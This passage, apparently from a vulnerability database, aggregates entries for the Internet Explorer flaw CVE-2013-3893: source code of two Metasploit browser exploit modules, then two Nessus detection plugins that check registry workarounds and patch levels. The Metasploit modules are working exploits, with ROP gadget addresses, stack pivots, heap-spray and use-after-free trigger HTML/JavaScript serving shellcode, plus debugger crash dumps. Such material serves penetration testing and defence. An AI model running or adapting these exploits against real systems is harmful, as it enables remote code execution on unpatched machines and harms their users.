target_info[:os]\n dll_used = ''\n\n case target_info[:dll]\n when @js_office_2007_str\n dll_used = \"Office 2007\"\n\n pivot =\n [\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\n junk, # ESI due to POPAD\n junk, # EBP due to POPAD\n junk,\n junk, # EBX due to POPAD\n junk, # EDX due to POPAD\n junk, # ECX due to POPAD\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\n 0x51bd81db, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\n\n when @js_office_2010_str\n dll_used = \"Office 2010\"\n\n pivot =\n [\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\n junk,\n junk,\n junk,\n junk,\n junk,\n 0x51BE7E9A, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\n\n when @js_default_str\n if target_info[:os] =~ /windows xp/i\n # XP uses msvcrt.dll\n dll_used = \"msvcrt\"\n\n pivot =\n [\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\n else\n # Assuming this is Win 7, and we'll use Java 6 ROP\n dll_used = \"Java\"\n\n pivot =\n [\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\n junk # Padding for the POP ECX\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\n end\n end\n\n print_status(\"Target uses #{os} with #{dll_used} DLL\")\n\n rop_payload\n end\n\n #\n # IE 6's call is at 6\n # IE 8's call is at 7\n # Don't think this one triggers on IE9\n #\n def get_sploit_html(target_info)\n os = target_info[:os]\n js_payload = ''\n\n if os =~ /Windows (7|XP) MSIE [78]\\.0/\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\n else\n print_error(\"Target not supported by this attack.\")\n return \"\"\n end\n\n %Q|<html>\n<head>\n<script>\n#{js_property_spray}\nsprayHeap({shellcode:unescape(\"#{js_payload}\")});\n\nvar earth = document;\nvar data = \"\";\nfor (i=0; i<17; i++) {\n if (i==6) { data += unescape(\"%u2020%u2030\"); }\n else if (i==7) { data += unescape(\"%u2020%u2030\"); }\n else { data += unescape(\"%u4141%u4141\"); }\n}\ndata += \"\\\\u4141\";\n\nfunction butterfly() {\n for(i=0; i<20; i++) {\n var effect = earth.createElement(\"div\");\n effect.className = data;\n }\n}\n\nfunction kaiju() {\n var godzilla = earth.createElement(\"textarea\");\n var minilla = earth.createElement(\"pre\");\n earth.body.appendChild(godzilla);\n earth.body.appendChild(minilla);\n godzilla.appendChild(minilla);\n\n godzilla.onselect=function(e) {\n minilla.swapNode(earth.createElement(\"div\"));\n }\n\n var battleStation = false;\n var war = new Array();\n godzilla.onpropertychange=function(e) {\n if (battleStation == true) {\n for (i=0; i<50; i++) {\n war.push(earth.createElement(\"span\"));\n }\n }\n\n earth.execCommand(\"Unselect\");\n\n if (battleStation == true) {\n for (i=0; i < war.length; i++) {\n war[i].className = data;\n }\n }\n else {\n battleStation = true;\n }\n }\n\n butterfly();\n godzilla.select();\n}\n</script>\n</head>\n<body onload='kaiju()'>\n</body>\n</html>\n |\n end\n\n\n def on_request_uri(cli, request)\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\n target_info =\n {\n :os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),\n :dll => Rex::Text.uri_decode($2)\n }\n\n sploit = get_sploit_html(target_info)\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n return\n end\n\n html = get_check_html\n print_status(\"Checking out target...\")\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n end\n\n def exploit\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\n @js_default_str = Rex::Text.rand_text_alpha(6)\n super\n end\nend\n\n\n=begin\n\n+hpa this for debugging or you might not see a crash at all :-)\n\n0:005> r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\n0:005> u\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx]\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\n6d6dc12c 51 push ecx\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\n6d6dc132 53 push ebx\n6d6dc133 bf02400080 mov edi,80004002h\n6d6dc138 ff10 call dword ptr [eax]\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb"}, {"lastseen": "2020-10-12T22:28:47", "description": "This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventuall this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.\n", "published": "2013-09-29T23:24:13", "type": "metasploit", "title": "MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_SETMOUSECAPTURE_UAF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free\",\n 'Description' => %q{\n This module exploits a use-after-free vulnerability that currents targets Internet\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\n It was initially found in the wild in Japan, but other regions such as English,\n Chinese, Korean, etc, were targeted as well.\n\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\n reference during an event. An attacker first can setup two elements, where the second\n is the child of the first, and then setup a onlosecapture event handler for the parent\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\n one for the parent element, one for the child. When the setCapture() call for the child\n element is called, it finally triggers the event, which allows the attacker to cause an\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\n memory. The exact size of this memory may differ based on the version of IE. After the\n free, an invalid reference will still be kept and pass on to more functions, eventuall\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\n code execution) when this function attempts to use this reference to call what appears to\n be a PrivateQueryInterface due to the offset (0x00).\n\n To mimic the same exploit found in the wild, this module will try to use the same DLL\n from Microsoft Office 2007 or 2010 to leverage the attack.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild first spotted in Japan\n 'sinn3r', # Metasploit (thx binjo for the heads up!)\n 'Rich Lundeen' # IE8 windows xp\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3893' ],\n [ 'OSVDB', '97380' ],\n [ 'MSB', 'MS13-080' ],\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ],\n [ 'URL', 'https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free' ]\n ],\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :ua_name => HttpClients::IE,\n :source => /script/i\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [\n 'Windows 7 with Office 2007|2010',\n {\n :os_name => 'Windows 7',\n :ua_ver => \"9.0\",\n :office => /2007|2010/\n }\n ],\n [\n 'Windows XP with IE 8',\n {\n :os_name => 'Windows XP',\n :ua_ver => \"8.0\"\n }\n ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\n },\n 'DefaultOptions' =>\n {\n 'PrependMigrate' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2013-09-17',\n 'DefaultTarget' => 0))\n end\n\n def junk\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(target_info)\n code = payload.encoded\n rop = ''\n alignment = ''\n\n case target_info[:office]\n when '2007'\n alignment =\n [\n junk, # Alignment\n ].pack(\"V*\")\n\n rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })\n\n when '2010'\n alignment =\n [\n # 4 dword junks due to the add esp in stack pivot\n junk,\n junk,\n junk,\n junk,\n 0x51bf518b, # ret\n junk # due to the ret 4 on the stack pivot\n ].pack(\"V*\")\n\n rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })\n end\n\n p = alignment + rop + code\n p\n end\n\n def get_exploit_html_ie9(cli, target_info)\n gadgets = {}\n case target_info[:office]\n when '2007'\n gadgets[:spray1] = 0x1af40020\n\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\n gadgets[:target] = 0x3160ff5c\n\n # mov eax, [esi]\n # push esi\n # call [eax+4]\n gadgets[:call_eax] = 0x51bd1ce8\n\n # xchg eax,esp\n # add byte [eax], al\n # pop esi\n # mov [edi+23c], ebp\n # mov [edi+238], ebp\n # mov [edi+234], ebp\n # pop ebp\n # pop ebx\n # ret\n gadgets[:pivot] = 0x51be4418\n\n when '2010'\n gadgets[:spray1] = 0x1a7f0020\n\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\n gadgets[:target] = 0x301fff5c\n\n # mov eax, [esi]\n # push esi\n # call [eax+4]\n gadgets[:call_eax] = 0x51bd1a41\n\n # xchg eax,esp\n # add eax,dword ptr [eax]\n # add esp,10\n # mov eax,esi\n # pop esi\n # pop ebp # retn 4\n gadgets[:pivot] = 0x51c00e64\n end\n\n p1 =\n [\n gadgets[:target], # Target address\n gadgets[:pivot] # stack pivot\n ].pack(\"V*\")\n\n p1 << get_payload(target_info)\n\n # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\n p2 = [ gadgets[:call_eax] ].pack(\"V*\")\n\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\n js_p1 = Rex::Text.to_unescape(p1)\n js_p2 = Rex::Text.to_unescape(p2)\n\n %Q|\n<html>\n<script>\n#{js_property_spray}\n\nfunction loadOffice() {\n try{location.href='ms-help://'} catch(e){}\n}\n\nvar a = new Array();\nfunction spray() {\n var obj = '';\n for (i=0; i<20; i++) {\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\n else { obj += \"\\\\u4242\\\\u4242\"; }\n }\n obj += \"\\\\u5555\";\n\n for (i=0; i<10; i++) {\n var e = document.createElement(\"div\");\n e.className = obj;\n a.push(e);\n }\n\n var s1 = unescape(\"#{js_p1}\");\n sprayHeap({shellcode:s1, maxAllocs:0x300});\n var s2 = unescape(\"#{js_p2}\");\n sprayHeap({shellcode:s2, maxAllocs:0x300});\n}\n\nfunction hit()\n{\n var id_0 = document.createElement(\"sup\");\n var id_1 = document.createElement(\"audio\");\n\n document.body.appendChild(id_0);\n document.body.appendChild(id_1);\n id_1.applyElement(id_0);\n\n id_0.onlosecapture=function(e) {\n document.write(\"\");\n spray();\n }\n\n id_0['outerText']=\"\";\n id_0.setCapture();\n id_1.setCapture();\n}\n\nfor (i=0; i<20; i++) {\n document.createElement(\"frame\");\n}\n\nwindow.onload = function() {\n loadOffice();\n hit();\n}\n</script>\n</html>\n |\n end\n\n def get_exploit_html_ie8(cli, target_info)\n code = payload.encoded\n\n #address containing our heap spray is 0x20302020\n spray_addr = \"\\\\u2024\\\\u2030\"\n\n #size to fill after free is 0x50\n free_fill = spray_addr + \"\\\\u2424\" * (((0x50-1)/2)-2)\n\n rop = [\n 0x77c3868a, # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;\n 0x20302020 # pointer to stack pivot\n ].pack(\"V*\")\n\n rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code\n\n js_rop = Rex::Text.to_unescape(rop)\n\n %Q|\n<html>\n<script>\n\n#{js_property_spray}\n\ntt = new Array(30);\n\nfunction trigger()\n{\n var id_0 = document.createElement(\"sup\");\n var id_1 = document.createElement(\"audio\");\n\n document.body.appendChild(id_0);\n document.body.appendChild(id_1);\n id_1.applyElement(id_0);\n\n id_0.onlosecapture=function(e) {\n document.write(\"\");\n\n for(i = 0; i < tt.length; i++) {\n tt[i] = document.createElement('div');\n tt[i].className =\"#{free_fill}\";\n }\n\n var s = unescape(\"#{js_rop}\");\n sprayHeap({shellcode:s});\n }\n\n id_0['outerText']=\"\";\n id_0.setCapture();\n id_1.setCapture();\n}\n\nwindow.onload = function() {\n trigger();\n}\n</script>\n |\n\n end\n\n def on_request_exploit(cli, request, target_info)\n case target_info[:ua_ver]\n when \"8.0\"\n html = get_exploit_html_ie8(cli, target_info)\n when \"9.0\"\n html = get_exploit_html_ie9(cli, target_info)\n end\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n\n end\nend\n\n=begin\n\nhxds.dll (Microsoft\u00ae Help Data Services Module)\n\n 2007 DLL info:\n ProductVersion: 2.05.50727.198\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\n\n 2010 DLL info:\n ProductVersion: 2.05.50727.4039\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\n\nmshtml.dll\n\n WinXP IE8 DLL info:\n ProductVersion: 8.0.6001.18702\n FileVersion: 8.0.6001.18702\n FileDescription: Microsoft (R) HTML Viewer\n\n Win7 IE9 DLL info:\n ProductVersion: 9.00.8112.16446\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\n FileDescription: Microsoft (R) HTML Viewer\n\n\n0:005> r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nMSHTML!CTreeNode::GetInterface+0xd8:\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\n\n\n66e13df7 8b0e mov ecx,dword ptr [esi]\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\n66e13e01 ffd0 call eax\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_setmousecapture_uaf.rb"}], "nessus": [{"lastseen": "2017-10-29T13:42:37", "edition": 3, "description": "The remote host is missing one of the workarounds referenced in KB 2887505.\n\nThe remote version of Internet Explorer (IE) reportedly has a memory corruption vulnerability related to how IE accesses an object in memory that has been deleted or has not been properly allocated. By exploiting this flaw, a remote, unauthenticated attacker could execute arbitrary code on the remote host subject to the privileges of the user running the affected application.", "published": "2013-09-17T00:00:00", "type": "nessus", "title": "MS KB2887505: Vulnerability in Internet Explorer Could Allow Remote Code Execution", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3893"], "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "modified": "2017-08-30T00:00:00", "id": "SMB_KB2887505.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69931", "sourceData": "#@DEPRECATED@\n#\n# Disabled on 2013/10/08. Deprecated by smb_nt_ms13-080.nasl\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69931);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2017/08/30 19:28:47 $\");\n\n script_cve_id(\"CVE-2013-3893\");\n script_bugtraq_id(62453);\n script_osvdb_id(97380);\n script_xref(name:\"MSKB\", value:\"2887505\");\n\n script_name(english:\"MS KB2887505: Vulnerability in Internet Explorer Could Allow Remote Code Execution\");\n script_summary(english:\"Checks if workarounds referenced in KB article have been applied.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is affected by a remote code execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing one of the workarounds referenced in KB\n2887505.\n\nThe remote version of Internet Explorer (IE) reportedly has a memory\ncorruption vulnerability related to how IE accesses an object in memory\nthat has been deleted or has not been properly allocated. By exploiting\nthis flaw, a remote, unauthenticated attacker could execute arbitrary\ncode on the remote host subject to the privileges of the user running\nthe affected application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/advisory/2887505\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the IE settings workarounds suggested by Microsoft in the\nadvisory, or apply the MSHTML Shim workaround in the Microsoft\n'Fix it' solution.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Internet Explorer SetMouseCapture Use-After-Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"microsoft_emet_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use plugin #70332 (smb_nt_ms13-080.nasl) instead.');\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nregistry_init();\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\nsystemroot = hotfix_get_systemroot();\nif(!systemroot) audit(AUDIT_FN_FAIL, 'hotfix_get_systemroot');\n\nguid = '{55aab41f-5d5c-abdf-4568-baef76587bd7}';\npath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\\" + guid);\nRegCloseKey(handle:hklm);\n\nif (isnull(path)) path = systemroot + \"\\AppPatch\\Custom\\\" + guid + '.sdb';\n\n# Now make sure the file is in place\nif (hotfix_file_exists(path:path))\n{\n hotfix_check_fversion_end();\n exit(0, \"The host is not affected since the Microsoft 'Fix it' has been applied.\");\n}\n\n# hotfix_file_exists calls NetUseDel(close:FALSE), so we must reconnect\nregistry_init();\n\n\nemet_info = '';\n\nemet_installed = FALSE;\nemet_with_ie = FALSE;\n\nif (!isnull(get_kb_item(\"SMB/Microsoft/EMET/Installed\")))\n emet_installed = TRUE;\n\n# Check if EMET is configured with IE.\n# The workaround does not specifically ask to enable DEP\n# but if IE is configured with EMET, dep is enabled by default.\n\nemet_list = get_kb_list(\"SMB/Microsoft/EMET/*\");\nif (!isnull(emet_list))\n{\n foreach entry (keys(emet_list))\n {\n if (\"iexplore.exe\" >< entry && \"/dep\" >< entry)\n {\n dep = get_kb_item(entry);\n if (!isnull(dep) && dep == 1)\n emet_with_ie = TRUE;\n }\n }\n}\n\nif (!emet_installed)\n{\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is not' +\n '\\n installed.';\n}\nelse if (emet_installed)\n{\n if (!emet_with_ie)\n {\n emet_info =\n '\\n Microsoft Enhanced Mitigation Experience Toolkit (EMET) is' +\n '\\n installed, however Internet Explorer is not configured with EMET.';\n }\n}\n\ninfo_user_settings = '';\n\n# check mitigation per user\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nsubkeys = get_registry_subkeys(handle:hku, key:'');\n\nforeach key (subkeys)\n{\n if ('.DEFAULT' >< key || 'Classes' >< key ||\n key =~ \"^S-1-5-\\d{2}$\") # skip built-in accounts\n continue;\n\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n if (isnull(value) && isnull(value1))\n continue;\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = '\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hku, item:key + key_part_intranet);\n value1 = get_registry_value(handle:hku, item:key + key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (!mitigation)\n info_user_settings += '\\n ' + key + ' (Active Scripting Enabled)';\n}\n\nRegCloseKey(handle:hku);\n\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n# check if user settings have been overriden by what is in HKLM\n# note: Security_HKLM_only can be set by group policy\nvalue = get_registry_value(handle:hklm, item:'SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Security_HKLM_only');\n\nif (info_user_settings != '' && !isnull(value) && value == 1)\n{\n mitigation = FALSE;\n\n# \"Set Internet and Local intranet security zone settings to \"High\" to block ActiveX Controls and Active Scripting in these zones\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\CurrentLevel';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\CurrentLevel';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 0x00012000 = 73728 = High Security\n if (!isnull(value) && !isnull(value1) &&\n value == 73728 && value1 == 73728)\n mitigation = TRUE;\n\n# \"Configure Internet Explorer to prompt before running Active Scripting or to disable Active Scripting in the Internet and Local intranet security zone\"\n key_part_intranet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\1400';\n key_part_internet = 'SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1400';\n\n value = get_registry_value(handle:hklm, item:key_part_intranet);\n value1 = get_registry_value(handle:hklm, item:key_part_internet);\n\n # 1 = prompt, 3 = disable\n if (!isnull(value) && !isnull(value1) &&\n (value == 1 || value == 3) && (value1 == 1 || value1 == 3))\n mitigation = TRUE;\n\n if (mitigation)\n info_user_settings = '';\n}\n\nRegCloseKey(handle:hklm);\n\nclose_registry();\n\nif (info_user_settings != '')\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (emet_info != '')\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n' + emet_info + '\\n';\n else\n report =\n '\\n The remote host is missing the MSHTML Shim workaround and the' +\n '\\n following users have vulnerable IE settings :' + info_user_settings + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The host is not affected since a workaround has been applied.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-01T06:15:04", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2879017.\n\nThe installed version of IE is affected by multiple vulnerabilities that\ncould allow an attacker to execute arbitrary code on the remote host.", "edition": 28, "published": "2013-10-09T00:00:00", "title": "MS13-080: Cumulative Security Update for Internet Explorer (2879017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-3882", "CVE-2013-3873", "CVE-2013-3875", "CVE-2013-3874", "CVE-2013-3885", "CVE-2013-3893", "CVE-2013-3897", "CVE-2013-3886", "CVE-2013-3872"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS13-080.NASL", "href": "https://www.tenable.com/plugins/nessus/70332", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70332);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2013-3872\",\n \"CVE-2013-3873\",\n \"CVE-2013-3874\",\n \"CVE-2013-3875\",\n \"CVE-2013-3882\",\n \"CVE-2013-3885\",\n \"CVE-2013-3886\",\n \"CVE-2013-3893\",\n \"CVE-2013-3897\"\n );\n script_bugtraq_id(\n 62803,\n 62804,\n 62805,\n 62806,\n 62808,\n 62809,\n 62810,\n 62811,\n 62453\n );\n script_xref(name:\"MSFT\", value:\"MS13-080\");\n script_xref(name:\"MSKB\", value:\"2879017\");\n\n script_name(english:\"MS13-080: Cumulative Security Update for Internet Explorer (2879017)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host is affected by multiple code execution\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2879017.\n\nThe installed version of IE is affected by multiple vulnerabilities that\ncould allow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-232/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-233/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-234/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-236/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-080\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2, 8, 